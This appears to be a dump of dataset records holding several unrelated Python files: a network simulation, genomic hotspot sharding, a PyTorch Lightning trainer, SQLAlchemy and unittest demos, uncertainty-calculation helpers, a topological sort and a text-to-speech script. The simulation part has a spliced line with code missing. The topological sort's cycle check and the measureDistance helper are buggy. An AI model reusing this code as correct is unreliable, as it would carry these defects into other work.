neighbors_list=[]\n lsize = int(math.sqrt(self.total_nodes))\n idx = self.node_idx\n xp = idx // lsize\n yp = idx % lsize\n\n rxmin = xp - 2\n rxmax = xp + 2\n rymin = yp - 2\n rymax = yp + 2\n\n if rxmin < 0:\n rxmin = 0\n if rxmax > lsize:\n rxmax = lsize\n if rymin < 0:\n rymin = 0\n if rymax > lsize:\n rymax = lsize\n\n for x in range(rxmin,rxmax):\n for y in range(rymin,rymax):\n peer = (x * lsize) + y\n if peer!=idx and self.distance(peer) args.total_nodes:\n raise ValueError('nsims must be an integer between PSIZE (%d) and NNODES (%d)' %\n (psize, args.total_nodes))\n\nif rank == 0:\n print('> MODEL PARAMETERS:')\n print('>> TOTAL NODES:', args.total_nodes)\n print('>> LOOKAHEAD:', args.lookahead)\n print('>> CHOICE:', args.choice)\n print('>> TOTAL SIMS: ', args.nsims)\n print('>> END TIME: ', args.endtime)\n print('>> TOTAL SPMD PROCESSES:', psize)\n\nnodes=[]\n# create simulators and nodes\nsims = [] # all simulators instantiated on this machine\nfor s in range(BLOCK_LOW(rank, psize, args.nsims), BLOCK_LOW(rank+1, psize, args.nsims)):\n sim = simulus.simulator(name='sim%d'%s)\n sims.append(sim)\n #print('[%d] creating simulator %s...' % (rank, sim.name))\n\n for idx in range(BLOCK_LOW(s, args.nsims, args.total_nodes),\n BLOCK_LOW(s+1, args.nsims, args.total_nodes)):\n #print('[%d] creating node %d...' % (rank, idx))\n nodes.append(node(sim, idx, args.total_nodes,args.lookahead))\n\nif args.choice == 1:\n # case 1: sequential simulation\n if psize > 1:\n raise RuntimeError(\"You are running MPI; consider CHOICE 3 or 4.\")\n syn = simulus.sync(sims)\nelif args.choice == 2:\n # case 2: parallel simulation on shared-memory multiprocessors\n if psize > 1:\n raise RuntimeError(\"You are running MPI; consider CHOICE 3 or 4.\")\n syn = simulus.sync(sims, enable_smp=True)\nelif args.choice == 3:\n # case 3: parallel simulation with mpi\n syn = simulus.sync(sims, enable_spmd=True)\nelif args.choice == 4:\n # case 4: parallel simulation with mpi and multiprocessing\n syn = simulus.sync(sims, enable_smp=True, enable_spmd=True)\nelse:\n raise ValueError(\"CHOICE (%d) should be 1-4\" % choice)\n\n# Init grid\npositions = []\nrandom.seed(args.seedR)\n# Place nodes in grids\nfor x in range(int(math.sqrt(args.total_nodes))):\n for y in range(int(math.sqrt(args.total_nodes))):\n px = 50 + x*60 + random.uniform(-20,20)\n py = 50 + y*60 + random.uniform(-20,20)\n positions.append((px,py))\n\nif rank > 0:\n # only run() without parameters is allowed for higher ranks\n syn.run()\nelse:\n msgID = 1\n for i in range(int(args.endtime/10)):\n idx = random.randrange(len(nodes))\n delay = args.lookahead\n syn.send(sims[idx], 'mb%d'% idx, 'BROADCAST-hello-%d-0-0'%msgID,delay + i * 10)\n msgID+=1\n #time.sleep(10)\n #syn.send(sims[idx], 'mb%d'% idx, 'BROADCAST-hello-%d-0-0'%2,10)\n\n # run simulation and get runtime performance report\n syn.run(args.endtime)\n et = time.time()\n syn.show_runtime_report(prefix='>')\n print('>execution time python:', et - st)\n\n#timeout values\n#lookahead\n#ver delays\n#solucao para lazy push\n#peer sampling service\n#gerar msg id\n","repo_name":"luissobral4/EpidemicSimulationModels","sub_path":"SimulationTools/pTSimulus.py","file_name":"pTSimulus.py","file_ext":"py","file_size_in_byte":11827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70379151286","text":"# © 2019 University of Illinois Board of Trustees. All rights reserved\nimport ast\nimport argparse\nimport os\nimport logging\nfrom functools import reduce\nimport math\n\n\ndef measureDistance(pointA, pointB):\n \"\"\"\n Determines the distance pointB - pointA\n\n :param pointA: dict\n Point A\n\n :param pointB: dict\n Point B\n\n :return: int\n Distance\n \"\"\"\n if (pointA['chromosome'] != pointB['chromosome']):\n distance = float('inf');\n\n if ('position' in pointA) and ('position' in pointB):\n return pointB['position'] - pointA['position'];\n elif ('start' in pointB) and ('stop' in pointA):\n return pointB['start'] - pointA['stop'] + 1;\n else:\n raise ValueError(\"Bad arguments \" + str(pointA) + \", \" + str(pointB));\n\n\ndef hotspots_processor(hotspots):\n \"\"\"\n Generator for clustering adjacent hotspots\n\n :param hotspots: str\n File containing hotspots\n \"\"\"\n with open(hotspots, 'r') as fhandle:\n cluster = []\n\n for line in fhandle:\n point = ast.literal_eval(line)\n\n if len(cluster) == 0:\n cluster.append(point)\n else:\n if measureDistance(cluster[-1], point) == 1:\n cluster.append(point)\n else:\n yield cluster\n cluster = [point]\n\n if len(cluster) > 0:\n yield cluster\n\n\ndef count_hotspots(hotspots):\n \"\"\"\n Count the number of non-adjacent hotspots\n\n :param hotspots: str\n Hotspot filename\n\n :return: int\n Number of hotspots\n \"\"\"\n count = 0\n\n for _ in hotspots_processor(hotspots):\n count += 1\n\n return count\n\n\ndef cluster_hotspots(hotspots, min_separation, min_items_per_cluster):\n \"\"\"\n Cluster hotspot regions\n\n :param hotspots: str\n Hotspots filename\n\n :param min_separation: int\n Minimum separation between non-adjacent hotspots\n\n :param min_items_per_cluster: int\n Minimum number of non-adjacent hotspots\n \"\"\"\n hgen = hotspots_processor(hotspots)\n\n cluster = []\n\n for i, item in enumerate(hgen):\n if len(cluster) < min_items_per_cluster or measureDistance(cluster[-1][-1], item[0]) < min_separation:\n cluster.append(item)\n else:\n flattened_cluster = reduce(lambda a, b: a + b, cluster)\n yield flattened_cluster\n cluster = [item]\n \n if len(cluster) > 0:\n flattened_cluster = reduce(lambda a, b: a + b, cluster)\n yield flattened_cluster\n cluster = []\n\n\ndef main(args):\n dirpath, _ = os.path.split(os.path.abspath(args.outputPrefix));\n\n if os.path.exists(dirpath):\n assert(os.path.isdir(dirpath)), \"Invalid path\";\n logging.info(\"Directory %s exists\" % dirpath);\n else:\n os.makedirs(dirpath);\n logging.info(\"Creating directory %s\" % dirpath);\n\n logging.info(\"Counting hotspots\")\n num_hotspots = count_hotspots(args.hotspots)\n min_items_per_cluster = math.ceil(num_hotspots / args.maxShards)\n logging.info(\"Sharding with >= %d items per cluster\" % min_items_per_cluster)\n shard_gen = cluster_hotspots(\n args.hotspots, min_separation=args.minSeparation, min_items_per_cluster=min_items_per_cluster\n )\n counter = 0\n\n def dumpToFile(cluster_):\n if len(cluster_) == 0:\n return;\n\n with open(args.outputPrefix + \"%d.txt\" % counter, 'w') as whandle:\n for line in cluster_:\n whandle.write(str(line) + \"\\n\");\n\n for cluster in shard_gen:\n dumpToFile(cluster)\n counter += 1\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Shard a set of hotspots for parallel runs\");\n\n parser.add_argument(\n \"--hotspots\",\n help=\"File containing all hotspots of interest\",\n required=True,\n );\n\n parser.add_argument(\n \"--minSeparation\",\n help=\"Minimum separation between two hotspots for them to belong to two files\",\n default=25,\n );\n\n parser.add_argument(\n \"--maxShards\",\n help=\"Maximum number of shards to allow\",\n default=500,\n )\n\n parser.add_argument(\n \"--outputPrefix\",\n help=\"Prefix of output files\",\n required=True,\n );\n\n args = parser.parse_args();\n\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s');\n\n main(args)\n ","repo_name":"anands-repo/hello","sub_path":"python/shardHotspots.py","file_name":"shardHotspots.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"17147251014","text":"import torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nfrom pytorch_lightning.trainer.supporters import CombinedDataset\nfrom common.utils import flatten_dict\nfrom datasets.combo_dataloader import ComboDataloader\nfrom terrace import collate\nfrom git_timewarp import GitTimeWarp\n\nfrom datasets.make_dataset import make_dataloader, make_train_dataloader\nfrom models.make_model import make_model\nfrom validation.metrics import get_metrics, reset_metrics\nfrom .loss import get_losses\n\nclass Trainer(pl.LightningModule):\n \"\"\" General trainer for the neural networks \"\"\"\n\n @classmethod\n def from_checkpoint(cls, cfg, checkpoint_file, commit=None):\n return cls.load_from_checkpoint(checkpoint_file, cfg=cfg, commit=commit)\n\n def __init__(self, cfg):\n super().__init__()\n self.cfg = cfg\n\n from models.make_model import make_model\n self.model = make_model(cfg)\n\n self.metrics = nn.ModuleDict()\n\n for i, name in enumerate(self.cfg.val_datasets):\n val_loader = make_dataloader(self.cfg, name, \"val\", self.model.get_input_feats())\n tasks = set(self.model.get_tasks()).intersection(val_loader.dataset.get_tasks())\n\n # give the model an initial batch before training to initialize\n # its (lazily created) parameters\n x, y = collate([val_loader.dataset[0]])\n self.model.predict_train(x, y, tasks, \"val\", 0)\n \n def get_tasks(self, prefix, dataset_idx):\n dataset = self.get_dataset(prefix, dataset_idx)\n return set(self.model.get_tasks()).intersection(dataset.get_tasks())\n\n @property\n def device(self):\n return next(iter(self.parameters())).device\n\n def make_metrics(self, name, tasks, dataset_idx):\n if dataset_idx is None:\n key = f\"{name}_metrics\"\n else:\n key = f\"{name}_metrics_{dataset_idx}\"\n if key not in self.metrics:\n self.metrics[key] = get_metrics(self.cfg, tasks).to(self.device)\n return self.metrics[key]\n\n def get_metrics(self, name):\n ret = nn.ModuleDict()\n for key in self.metrics:\n if f\"{name}_metrics\" in key:\n ret.update(self.metrics[key])\n return ret\n \n def get_dataloader(self, prefix):\n if prefix == 'train':\n return self.trainer.train_dataloader.loaders\n elif prefix == 'val':\n return self.trainer.val_dataloaders\n\n def get_dataset(self, prefix, dataset_idx):\n loader = self.get_dataloader(prefix)\n if isinstance(loader, list):\n if dataset_idx is None:\n dataset_idx = 0\n loader = loader[dataset_idx]\n\n if isinstance(loader, ComboDataloader) and dataset_idx is not None:\n return loader.loaders[dataset_idx].dataset\n\n if isinstance(loader.dataset, CombinedDataset):\n dataset = loader.dataset.datasets\n else:\n dataset = loader.dataset\n\n return dataset\n\n def shared_eval(self, prefix, batch, batch_idx, dataset_idx=None):\n\n x, y = batch\n tasks = self.get_tasks(prefix, dataset_idx)\n metrics = self.make_metrics(prefix, tasks, dataset_idx)\n\n pred = self.model.predict_train(x, y, tasks, prefix, batch_idx)\n loss, loss_dict = get_losses(self.cfg, tasks, x, pred, y)\n\n if dataset_idx is not None:\n self.log(f\"{prefix}/loss\", loss, prog_bar=True, batch_size=len(x))\n for key, val in loss_dict.items():\n self.log(f\"{prefix}/{key}\", val, prog_bar=True, batch_size=len(x))\n \n on_step = prefix == \"train\"\n on_epoch = not on_step\n computed_metrics = {}\n for key, val in metrics.items():\n val.update(x, pred, y)\n if prefix == 'train' and batch_idx % self.cfg.metric_reset_interval == 0:\n computed_metrics[key] = val.compute()\n val.apply(reset_metrics)\n\n dataset = self.get_dataset(prefix, dataset_idx)\n\n dataset_name = dataset.get_name()\n for key, val in flatten_dict(computed_metrics).items():\n self.log(f\"{prefix}/{dataset_name}/{key}\", val, prog_bar=False, on_step=on_step, on_epoch=on_epoch, batch_size=len(x), add_dataloader_idx=False)\n\n if \"profile_max_batches\" in self.cfg and batch_idx >= self.cfg.profile_max_batches:\n raise RuntimeError(\"Stop the process!\")\n\n return loss\n\n def training_step(self, batch, batch_idx):\n loader = self.get_dataloader(\"train\")\n if isinstance(loader, ComboDataloader):\n dataset_idx = loader.get_dataset_index(batch_idx)\n return self.shared_eval(\"train\", batch, batch_idx, dataset_idx)\n return self.shared_eval('train', batch, batch_idx)\n \n def validation_step(self, batch, batch_idx, dataset_idx=None):\n return self.shared_eval('val', batch, batch_idx, dataset_idx)\n\n def test_step(self, batch, batch_idx, dataset_idx=None):\n return self.shared_eval('test', batch, batch_idx, dataset_idx)\n \n def shared_epoch_end(self, prefix):\n # todo cant handle multiple dataloaders\n if prefix != \"train\": # smh train epoch end sometimes logs before computing metrics\n self.log_all_metrics(prefix, None)\n self.get_metrics(prefix).apply(reset_metrics)\n\n def on_validation_epoch_end(self):\n self.shared_epoch_end(\"val\")\n\n def on_train_epoch_end(self):\n self.shared_epoch_end(\"train\")\n\n def on_test_epoch_end(self):\n self.shared_epoch_end(\"test\")\n\n def log_all_metrics(self, prefix, dataset_idx):\n dataset_name = self.get_dataset(prefix, dataset_idx).get_name()\n tasks = self.get_tasks(prefix, dataset_idx)\n metrics = self.make_metrics(prefix, tasks, dataset_idx)\n computed_metrics = {}\n for key, val in metrics.items():\n computed_metrics[key] = val.compute()\n for key, val in flatten_dict(computed_metrics).items():\n self.log(f\"{prefix}/{dataset_name}/{key}\", val, prog_bar=False, on_epoch=True, batch_size=1, add_dataloader_idx=False)\n\n def configure_optimizers(self):\n return torch.optim.AdamW(self.parameters(), lr=self.cfg.learn_rate)\n\n def fit(self, logger, callbacks):\n\n train_loader = make_train_dataloader(self.cfg, self.model.get_input_feats())\n # train_loader = make_dataloader(self.cfg, self.cfg.train_dataset, \"train\", self.model.get_input_feats())\n val_loaders = []\n for name in self.cfg.val_datasets:\n val_loader = make_dataloader(self.cfg, name, \"val\", self.model.get_input_feats())\n val_loaders.append(val_loader)\n\n gpus = int(torch.cuda.is_available())\n\n # from pytorch_lightning.profiler import PyTorchProfiler\n # profiler = PyTorchProfiler()\n\n self.trainer = pl.Trainer(gpus=gpus,\n num_sanity_val_steps=0,\n max_epochs=self.cfg.max_epochs,\n val_check_interval=self.cfg.val_check_interval,\n check_val_every_n_epoch=self.cfg.get(\"check_val_every_n_epoch\", 1),\n log_every_n_steps=self.cfg.metric_reset_interval,\n logger=logger,\n callbacks=callbacks,\n #profiler=profiler,\n resume_from_checkpoint=None)\n\n self.trainer.fit(self, train_loader, val_loaders)\n","repo_name":"molecularmodelinglab/plantain","sub_path":"training/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"76"} +{"seq_id":"8565155571","text":"import unittest\r\nfrom automation import Automation\r\n\r\nautomation = Automation()\r\nclass Automation(unittest.TestCase):\r\n\r\n\r\n def test_buscar(self):\r\n titulo = \"dodge 2000 stratus balatas\"\r\n texto_resultado = automation.buscar(titulo)\r\n self.assertEqual(texto_resultado, \"Hay 13 productos.\")\r\n automation.cerrar()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()","repo_name":"lucin21/ba-buscador","sub_path":"test_automation.py","file_name":"test_automation.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6051708336","text":"from sqlalchemy import Column, Integer, String, ForeignKey\nfrom sqlalchemy.orm import relation, relationship\n\nfrom TestPython.test_sqlalchemy.sqlalchemy_relationships import Base, engine, session\n\n\nclass User(Base):\n __tablename__ = 'users'\n id = Column('id', Integer, primary_key=True)\n name = Column('name', String(length=255))\n address = relationship('Address', uselist=False)\n\n\nclass Address(Base):\n __tablename__ = 'addresses'\n id = Column('id', Integer, primary_key=True)\n email = Column('email', String(length=255))\n user_id = Column(Integer, ForeignKey('users.id'))\n user = relationship('User', uselist=False)\n\n\nfor tbl in reversed(Base.metadata.sorted_tables):\n engine.execute(tbl.delete())\n\nBase.metadata.create_all(bind=engine)\n\n\nwendy = User(name='wendy')\nmary = User(name='mary')\nsession.add(wendy)\nsession.add(mary)\nsession.commit()\n\naddress1 = Address(email=\"a1\", user_id=wendy.id)\naddress2 = Address(email=\"a2\", user_id=wendy.id)\naddress3 = Address(email=\"a3\", user_id=wendy.id)\nsession.add(address1)\nsession.add(address2)\nsession.add(address3)\nsession.commit()\n\n","repo_name":"r-azh/TestProject","sub_path":"TestPython/test_sqlalchemy/sqlalchemy_relationships/one_to_one.py","file_name":"one_to_one.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71371542967","text":"from decimal import *\r\n\r\n\"\"\"\r\nAll the data are in type of Decimal, all data are analysed in 2-d matrix of numpy\r\n\"\"\"\r\n\r\nrowindex = [0.683, 0.9, 0.955, 0.997]\r\ncolumnindex = [3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 21]\r\n\r\ndata = [\r\n ['1.32', '1.2', '1.14', '1.11', '1.09', '1.08', '1.07', '1.06', '1.04',\r\n '1.03', '1'],\r\n ['2.92', '2.35', '2.13', '2.02', '1.94', '1.89', '1.86', '1.83', '1.76',\r\n '1.73', '1.65'],\r\n ['4.3', '3.18', '2.78', '2.56', '2.45', '2.37', '2.31', '2.26', '2.15',\r\n '2.09', '1.96'],\r\n ['9.93', '5.84', '4.6', '4.03', '3.71', '3.5', '3.36', '3.25', '2.98',\r\n '2.86', '2.58']]\r\n\r\n\r\ndef toDecimal(num):\r\n \"\"\"\r\n :param num: a number from the test data which is of type float, int or string\r\n :return: the corresponding number in type of Decimal\r\n \"\"\"\r\n if isinstance(num, str):\r\n return Decimal(num)\r\n else:\r\n num = str(num)\r\n return Decimal(num)\r\n\r\n\r\ndef rounddigits(inttype):\r\n \"\"\"\r\n Given a int number, pop a Decimal with the digits of inttype. eg. input:3, output: Decimal('0.001')\r\n This should be only used in .quantize() method in Decimal class.\r\n :param inttype: a number in type of int\r\n :return: a Decimal with the digits of inttype\r\n \"\"\"\r\n return Decimal(10) ** ((-1) * inttype)\r\n\r\n\r\ndef eff(num):\r\n \"\"\"\r\n 接受一个数字num in Decimal并返回其有效数字数量\r\n :param num: a number in type of Decimal\r\n :return: the number of effective digits\r\n \"\"\"\r\n num = num.to_eng_string()\r\n assert isinstance(num, str)\r\n digits = 0\r\n is_leading_zero = True\r\n for i in range(len(num)):\r\n if num[i] == 'E' or num[i] == 'e':\r\n break\r\n digit = ord(num[i]) - ord('0')\r\n if 0 <= digit <= 9:\r\n if digit > 0 or (digit == 0 and not is_leading_zero):\r\n digits += 1 # 每遇到有效数字: digit++\r\n is_leading_zero = False # 遇到第一个有效数字后所有的0都不是leading zero了,都是有效数字\r\n return max(digits, 1)\r\n\r\n\r\ndef digits(num, truedigit=False):\r\n \"\"\"\r\n :param num: (Decimal) a number in type of Decimal\r\n :return: (int) the effective digits after the decimal dot\r\n \"\"\"\r\n if not isinstance(num, Decimal):\r\n raise TypeError(r' type is needed, not ' + str(type(num)) + '.')\r\n\r\n numstr = num.to_eng_string()\r\n try:\r\n temp = numstr.split('.')[1]\r\n except: # if num is an integer\r\n return len(numstr.split('.')[0])\r\n\r\n if truedigit:\r\n # if number is a pure dicemal\r\n if numstr.split('.')[0] == '0':\r\n return eff(num)\r\n else:\r\n return len(temp)\r\n else:\r\n return len(temp)\r\n\r\n\r\ndef checkeff(datamat):\r\n # Need to be tested#\r\n \"\"\"\r\n This function is used to check if there are any data loose their last digit '0' throughout the numpy data matrix\r\n :param datamat: the checked numpy datamatrix with elements in type of Decimal. ¡The data must not have any indices!\r\n :return: the corrected datamatrix\r\n \"\"\"\r\n counter = {}\r\n length = len(datamat)\r\n for i in range(0, length):\r\n num = datamat[i]\r\n try:\r\n counter[str(digits(num))] += 1\r\n except KeyError:\r\n counter[str(digits(num))] = 1\r\n if len(counter) == 1:\r\n print(\"No data need to be fixed.\")\r\n return datamat\r\n else:\r\n tempkeyarray = []\r\n tempvaluearray = []\r\n for k in counter.keys():\r\n tempkeyarray.append(k)\r\n tempvaluearray.append(counter[k])\r\n maxdigit = tempkeyarray[tempvaluearray.index(max(tempvaluearray))]\r\n maxdigit = int(maxdigit)\r\n for i in range(0, length):\r\n datamat[i] = datamat[i].quantize(Decimal(10) ** ((-1) * maxdigit))\r\n\r\n print(\"Data has been fixed\")\r\n return datamat\r\n\r\n\r\ndef findMean(array, auto=True, roundornot=True):\r\n \"\"\"\r\n :param array: (Decimal array) an array which elements are in type of Decimal\r\n :param auto: (boolean) switch if the return value saves one digit more automatically, default as true\r\n :param roundornot: (boolean) choose if the the result is to be rounded\r\n :return: (Decimal) the mean of this array in Decimal\r\n \"\"\"\r\n digeff = digits(array[0]) # the effective digits after the decimal dot\r\n if auto:\r\n digeff += 1\r\n\r\n n = Decimal(len(array)) # the length of array in type of Decimal\r\n arraysum = sum(array)\r\n\r\n mean = arraysum / n\r\n if roundornot:\r\n meanString = mean.to_eng_string()\r\n meanStringDecimalPart = meanString.split('.')[1]\r\n if len(meanStringDecimalPart) == (digeff - 1):\r\n digeff -= 1\r\n return mean.quantize(rounddigits(digeff), ROUND_HALF_EVEN)\r\n else:\r\n return mean\r\n\r\n\r\ndef findSigmaSquare(array, auto=True, perceMod=False, roundornot=True):\r\n \"\"\"\r\n Give the variance of the input array (data).\r\n :param array: (Decimal array) the data that is wanted to find the variance.\r\n :param auto: (boolean) switch if the return value saves one digit more automatically, default as true.\r\n :param perceMod: (boolean) switch if calculate from the original array or by function .findMean(auto = Ture)\r\n :param roundornot: (boolean) choose if the the result is to be rounded\r\n :return: (Decimal) the sample variance.\r\n \"\"\"\r\n digeff = digits(array[0]) # the effective digits after the decimal dot\r\n if auto:\r\n digeff += 1\r\n\r\n n = Decimal(len(array))\r\n if not perceMod:\r\n mean = findMean(array, auto=True, roundornot=True)\r\n else:\r\n mean = findMean(array, auto=True, roundornot=False)\r\n\r\n errorSquareSum = sum([(x - mean) ** 2 for x in array])\r\n sigmaSquare = errorSquareSum / (n - 1)\r\n\r\n if roundornot:\r\n return sigmaSquare.quantize(rounddigits(digeff), ROUND_HALF_EVEN)\r\n else:\r\n return sigmaSquare\r\n\r\n\r\ndef findSigma(array, auto=True, perceMod=True, roundornot=True):\r\n \"\"\"\r\n :param array: (Decimal array) the data that is wanted to find the SD.\r\n :param auto: (boolean) switch if the return value saves one digit more automatically, default as true.\r\n :param perceMod: (boolean) switch if calculate from the original array or by function .findMean(auto = Ture)\r\n :return: (Decimal) the standard difference of the input data\r\n \"\"\"\r\n\r\n if not perceMod:\r\n SigmaSquare = findSigmaSquare(array, auto=True, perceMod=False, roundornot=True)\r\n else:\r\n SigmaSquare = findSigmaSquare(array, auto=True, perceMod=True, roundornot=False)\r\n\r\n sigma = SigmaSquare.sqrt()\r\n zeroflag = False\r\n decimalflag = False\r\n\r\n sigmaString = sigma.to_eng_string()\r\n intPart = sigmaString.split('.')[0]\r\n if not len(intPart) == len(sigmaString):\r\n decimalflag = True\r\n decimalPart = sigmaString.split('.')[1]\r\n digiteff = 0\r\n if intPart == '0':\r\n while decimalPart[digiteff] == '0':\r\n digiteff += 1\r\n digiteff += 2\r\n else:\r\n digiteff = -len(intPart) + 2\r\n elif sigmaString == '0':\r\n zeroflag = True\r\n else:\r\n digiteff = 0\r\n digiteff = -len(intPart) + 2\r\n\r\n if roundornot:\r\n if zeroflag:\r\n return sigma.sqrt()\r\n elif decimalflag:\r\n if decimalPart[digiteff - 1] == '0':\r\n digiteff += 1\r\n return (SigmaSquare.sqrt()).quantize(rounddigits(digiteff), ROUND_HALF_EVEN)\r\n else:\r\n return (SigmaSquare.sqrt()).quantize(rounddigits(digiteff), ROUND_HALF_EVEN)\r\n else:\r\n return SigmaSquare.sqrt()\r\n\r\n\r\ndef findAverageStanderdDifference(array, auto=True, perceMod=False, roundornot=True):\r\n \"\"\"\r\n\r\n :param array: (Decimal array)\r\n :param auto: (boolean)\r\n :param perceMod: (boolean)\r\n :param roundornot: (boolean)\r\n :return: (Decimal)\r\n \"\"\"\r\n digeff = digits(array[0]) # the effective digits after the decimal dot\r\n if auto:\r\n digeff += 1\r\n\r\n if not perceMod:\r\n sigma = findSigma(array, auto=True, perceMod=False, roundornot=True)\r\n else:\r\n sigma = findSigma(array, auto=True, perceMod=True, roundornot=False)\r\n\r\n n = Decimal(len(array))\r\n if roundornot:\r\n return (sigma / (n.sqrt())).quantize(rounddigits(digeff), ROUND_HALF_EVEN)\r\n else:\r\n return sigma / (n.sqrt())\r\n\r\n\r\ndef findPIndexOfFactor(number):\r\n try:\r\n return rowindex.index(number)\r\n except BaseException:\r\n print('Cannot Find Corresponding Index of Input P.')\r\n\r\n\r\ndef findnIndexOfFactor(number):\r\n try:\r\n return columnindex.index(number)\r\n except BaseException:\r\n print('Cannot Find Corresponding Index of Input n.')\r\n\r\n\r\ndef findCorrectionFactor(n, P):\r\n \"\"\"\r\n\r\n :param n: (int) the number of attempts of experiments\r\n :param P: (float) the wanted probability\r\n :return: (Decimal) the correction factor\r\n \"\"\"\r\n return Decimal(data[findPIndexOfFactor(P)][findnIndexOfFactor(n)])\r\n\r\n\r\ndef checkLayouts(array, range=3):\r\n \"\"\"\r\n :param array: (Decimal array) input data.\r\n :param range: (int > 0) the range (x*sigma, default for x = 3) of layout range.\r\n :return: (Decimal array) the array with out layouts. If there is any layouts, a notification\r\n will show up.\r\n \"\"\"\r\n mean = findMean(array)\r\n sigma = findSigma(array)\r\n minus3sigma = mean - range * sigma\r\n plus3sigma = mean + range * sigma\r\n newarray = []\r\n\r\n flag = 0\r\n for x in array:\r\n if x <= plus3sigma and x >= minus3sigma:\r\n newarray.append(x)\r\n else:\r\n if flag == 1:\r\n print('Layout:' + str(x))\r\n else:\r\n flag = 1\r\n print('There are layouts in this data.')\r\n print('Layout:' + str(x))\r\n return newarray\r\n\r\n\r\ndef findUa(array, n, P, perceMod=False, roundornot=True):\r\n CorrectionFactor = findCorrectionFactor(n=n, P=P)\r\n if perceMod:\r\n sigma = findSigma(array, perceMod=True, roundornot=False)\r\n else:\r\n sigma = findSigma(array)\r\n n = Decimal(len(array))\r\n Ua = CorrectionFactor * sigma / n.sqrt()\r\n\r\n zeroflag = False\r\n decimalflag = False\r\n\r\n UaString = Ua.to_eng_string()\r\n intPart = UaString.split('.')[0]\r\n if not len(intPart) == len(UaString): # the number is not a int\r\n decimalflag = True\r\n decimalPart = UaString.split('.')[1] # Ua cannot be zero\r\n digiteff = 0\r\n if intPart == '0':\r\n try:\r\n while decimalPart[digiteff] == '0': # find the second effective digits\r\n digiteff += 1\r\n digiteff += 2\r\n except IndexError: # the decimal is also equal to 0 (ua is 0.000)\r\n digiteff = 1\r\n else:\r\n digiteff = -len(intPart) + 2\r\n elif UaString == '0':\r\n zeroflag = True\r\n else:\r\n digiteff = 0\r\n digiteff = -len(intPart) + 2\r\n\r\n if roundornot:\r\n if zeroflag:\r\n return Ua\r\n elif decimalflag:\r\n return Ua.quantize(rounddigits(digiteff))\r\n else:\r\n return Ua.quantize(rounddigits(digiteff))\r\n else:\r\n return Ua\r\n\r\n\r\ndef findU(Ua, Ub, roundornot=True):\r\n \"\"\"\r\n :param Ua: (Decimal)\r\n :param Ub: (Decimal)\r\n :return: (Decimal)\r\n \"\"\"\r\n if (not isinstance(Ua, Decimal)) or (not isinstance(Ub, Decimal)):\r\n raise TypeError(\" is needed here, not \" + str(type(Ua)) + \" and \" + str(type(Ub)))\r\n\r\n U = (Ua ** 2 + Ub ** 2).sqrt()\r\n\r\n if roundornot:\r\n UString = U.to_eng_string()\r\n intPart = UString.split('.')[0]\r\n decimalPart = UString.split('.')[1] # U cannot be zero\r\n digiteff = 0\r\n if intPart == '0':\r\n while decimalPart[digiteff] == '0':\r\n digiteff += 1\r\n digiteff += 2\r\n else:\r\n digiteff = -len(intPart)\r\n return U.quantize(rounddigits(digiteff), ROUND_HALF_EVEN)\r\n else:\r\n return U\r\n\r\n\r\ndef roundU(u):\r\n \"\"\"\r\n Give a uncertainty U, round this U to\r\n :param u: Decimal\r\n :return: Decimal\r\n \"\"\"\r\n string = u.to_eng_string()\r\n intpart = string.split('.')[0]\r\n try:\r\n decimalpart = string.split('.')[1]\r\n digiteff = 0\r\n if intpart == '0':\r\n while decimalpart[digiteff] == '0':\r\n digiteff += 1\r\n digiteff += 1\r\n else:\r\n digiteff = -len(intpart) + 1\r\n except IndexError:\r\n digiteff = -len(intpart) + 1 # may not true\r\n return u.quantize(rounddigits(digiteff), ROUND_UP)\r\n\r\n\r\ndef roundMean(mean, roundedU):\r\n \"\"\"\r\n :param mean: Decimal mean with one digit more\r\n :param roundedU: Decimal rounded u with only 1 effective digit\r\n :return:\r\n \"\"\"\r\n return mean.quantize(roundedU, ROUND_HALF_EVEN)\r\n","repo_name":"DezhengLee/Labster","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":12900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19496898694","text":"import os\nimport sys\n\ndef dfs_topological_sort(arr, n):\n \"\"\" Topological sort with DFS. Return an empty list if\n there is a cycle.\n \"\"\"\n graph = [[] for _ in range(n)]\n for u, v in arr:\n graph[u].append(v)\n\n visited, stack = [0] * n, []\n\n def dfs(u):\n if visited[u] == -1:\n return False\n if visited[u] == 1:\n return True\n\n visited[u] = -1\n for v in graph[u]:\n if not dfs(v):\n return -1\n stack.append(u)\n visited[u] = 1\n return True\n\n for u in range(n):\n if not dfs(u):\n return []\n return stack[::-1]\n\n\narr = [[0, 3], [1, 2], [2, 3], [3, 4], [2, 4], [2, 5], [3, 5], [1, 3], [4, 5]]\ns = dfs_topological_sort(arr, 6)\nprint(s)\n","repo_name":"GaoangLiu/GaoangLiu.github.io","sub_path":"codes/sort/dfs_topological_sort.py","file_name":"dfs_topological_sort.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5977394541","text":"import sys\nimport os\nfrom create_video_from_slides import combine_with_mp3, pics_to_video_from_config\n\nfrom pptx_notes_to_ssml import pptx_to_notes_str\nfrom text_to_ssml import text_to_ssml\nfrom text_to_speech_azure import speech_synthesis_bookmark_event\n\n\n\ndef run_full_program(file_location: str, img_location: str, voice: str):\n if file_location.endswith('.pptx'):\n notes_text = pptx_to_notes_str(file_location)\n else:\n with open(file_location, 'r') as f:\n notes_text = f.read()\n print(\"got notes text\", notes_text)\n ssml_text = text_to_ssml(notes_text, voice=voice)\n print(\"constructed ssml 